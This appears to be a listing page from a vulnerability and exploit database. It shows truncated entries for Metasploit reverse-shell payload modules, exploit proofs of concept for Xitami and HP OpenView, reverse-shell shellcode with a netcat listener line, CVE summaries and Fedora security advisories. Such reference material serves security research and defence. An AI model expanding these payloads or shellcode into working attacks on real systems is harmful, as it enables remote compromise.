Windows Command, Double Reverse TCP Connection (via Perl)

Creates an interactive shell via perl This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule CachedSize = 148 include Msf::Payload::Single include Msf::Sessions::CommandShellOptions def initializeinfo...

Xitami Web Server 2.5c2 - LRWP Processing Format String (PoC)

/ PoC exploit for Xitami Web Server v2.5c2 LRWP processing format string bug Advisory is available at: http://www.bratax.be/advisories/b013.html multiple vulnerabilities! check it out! @author: bratax @url: http://www.bratax.be/ @email: [email protected] Thanks to BuzzDee for learning me how to us...

Xitami Web Server v2.5c2 LRWP Processing Format String PoC

Exploit for unknown platform in category dos / poc ========================================================== Xitami Web Server v2.5c2 LRWP Processing Format String PoC ========================================================== / PoC exploit for Xitami Web Server v2.5c2 LRWP processing format...

HP OpenView Network Node Manager (OV NNM) 7.5.1 - OVAS.exe Overflow (SEH)

HP OpenView Network Node Manager OV NNM 7.5.1 - OVAS.exe Overflow SEH !/usr/bin/python HP OpenView NNM 7.5.1 OVAS.EXE Pre Authentication SEH Overflow Tested on Windows 2003 Server SP1. Coded by Mati Aharoni muts..at..offensive-security.com http://www.offensive-security.com/0day/hp-nnm-ov.py.txt...

[SECURITY] Fedora 7 Update: Perlbal-1.70-1.fc7

Perlbal is a single-threaded event-based server supporting HTTP load balancing, web serving, and a mix of the two. Perlbal can act as either a w eb server or a reverse proxy. One of the defining things about Perlbal is that almost everything can be configured or reconfigured on the fly without...

[SECURITY] Fedora 8 Update: Perlbal-1.70-1.fc8

Perlbal is a single-threaded event-based server supporting HTTP load balancing, web serving, and a mix of the two. Perlbal can act as either a w eb server or a reverse proxy. One of the defining things about Perlbal is that almost everything can be configured or reconfigured on the fly without...

PECL 3.0.x - Alternative PHP Cache Extension apc_search_paths() Remote Buffer Overflow

PECL 3.0.x - Alternative PHP Cache Extension apcsearchpaths Remote Buffer Overflow source: https://www.securityfocus.com/bid/28457/info PECL Alternative PHP Cache APC extension is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input...

CVE-2008-1005

WebCore, as used in Apple Safari before 3.1, does not properly mask the password field when reverse conversion is used with the Kotoeri input method, which allows physically proximate attackers to read the password...

CVE-2008-1005

WebCore, as used in Apple Safari before 3.1, does not properly mask the password field when reverse conversion is used with the Kotoeri input method, which allows physically proximate attackers to read the password...

CVE-2008-1005

CVE-2008-1005 affects Apple Safari (WebCore) prior to 3.1. The issue is that the password field is not properly masked during reverse conversion with the Kotoeri input method, allowing physically proximate attackers to read the password. The related connected material confirms Safari 3.1 addresse...

Reverse NAT/Intercepting Proxy Detection

Reverse NAT is a technology which lets multiple computers offer public services on different ports via the same IP address. Based on OS fingerprinting results, it seems that different operating systems are listening on different remote ports. Note that this behavior may also indicate the presence...

PHP Command Shell, Reverse TCP (via PHP)

Reverse PHP connect back shell with checks for disabled functions This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule CachedSize = :dynamic include Msf::Payload::Single include Msf::Payload::Php...

Design/Logic Flaw

Geert Moernaut LSrunasE and Supercrypt use an encryption key composed of an SHA1 hash of a fixed string embedded in the executable file, which makes it easier for local users to obtain this key without reverse engineering...

Insecure Use of RC4 in LSrunasE and Supercrypt (CVE-2007-6340)

COMPASS SECURITY ADVISORY http://www.csnc.ch/ Product: LSrunasE, Supercrypt Vendor: Geert Moernaut Type: Flawed Encryption Risk: Medium Author: Daniel Roethlisberger Date: 2008-01-29 CVE Name: CVE-2007-6340 Introduction ------------ LSrunasE 1 and Supercrypt 2 are utilities used to run commands...

NetWare Command Shell, Reverse TCP Stager

Connect to the NetWare console staged. Connect back to the attacker This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'metasm' module MetasploitModule CachedSize = 281 include Msf::Payload::Stager include...

Digging inside the operating system does not export the function,will be injected to the end-vulnerability warning-the black bar safety net

InjectCode for Win9x.. Article author:Anskya Original source:see snow Forum Reproduced please retain the copyrightThank you Now injected many ways,but without the outer cover three: 1. Using the mapping code and then create a remote thread 2. The use of the message hook to insert the DLL in two 3...

Jetty fails to properly process URLs that contain double / characters

Overview The Jetty web server contains a vulnerability that may allow an attacker to access private files or directories. Description Jetty is a web server that is implemented in Java. Jetty contains a vulnerability in the way it processes URLs with multiple "/" slash characters. See the Jetty...

bsd/x86 reverse portbind 129 bytes

No description provided by source. / reverse-portshell BSD shellcode by noir / / local usage: ./reverse-shell 192.168.2.33 / / remote: nc -n -v -v -l -p 6969 / / listen on 6969/tcp / / [email protected] / char shellcode = 0x31,0xc9,0x51,0x41, ...

Windows 9x/NT/2k/XP Reverse Generic Shellcode w/o Loader 249 bytes

No description provided by source. We use the PEB for the Output/Input/Error Handles. typedef struct PEB BOOLEAN InheritedAddressSpace ; BOOLEAN ReadImageFileExecOptions ; BOOLEAN BeingDebugged ; BOOLEAN Spare ; HANDLE Mutant ; PVOID ImageBaseAddress ; PPEB LDR DATA LoaderData ; PRTL USER PROCESS...

IBM Director fails to properly time-out connection requests from clients

Overview IBM Director Systems, specifically CIM Server, contains a denial-of-service vulnerability that can allow a remote, unauthenticated attacker to render Director inoperative. Description IBM Director is a suite of system management tools.When a rogue connection request is made to IBM Direct...